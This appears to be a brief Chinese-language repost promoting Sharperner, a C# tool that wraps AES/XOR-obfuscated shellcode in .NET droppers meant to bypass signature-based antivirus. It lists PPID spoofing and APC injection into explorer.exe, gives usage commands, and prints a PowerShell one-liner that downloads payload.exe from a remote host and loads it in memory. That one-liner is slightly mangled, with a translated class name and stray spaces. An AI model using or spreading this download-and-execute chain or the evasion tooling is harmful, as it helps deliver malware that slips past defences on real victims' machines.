Sharperner - Shellcode生成器

Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查。

PE

  • PPID欺骗

  • 随机生成的 AES 密钥和 iv

  • 最终的 Shellcode、Key 和 IV

.NET

  • AES XOR 加密的 shellcode

  • APC 进程注入 (explorer.exe)

  • 随机函数名

  • 随机生成的 AES 密钥和 iv

  • 最终的 Shellcode、Key 和 IV

使用方法

/file B64,hex,raw shellcode/type cs,cpp/out Output file Location (Optional)
Example:Sharperner.exe /file:file.txt /type:cppSharperner.exe /file:file.txt /out:payload.exe

生成的 .NET 可执行文件可以使用 powershell 反射加载

$data  = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' ) $assem  = [ System.Reflection.Assembly ]::Load( $data ) [ TotallyNotMal.程序]::Main()

项目地址

https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1

(0)

相关推荐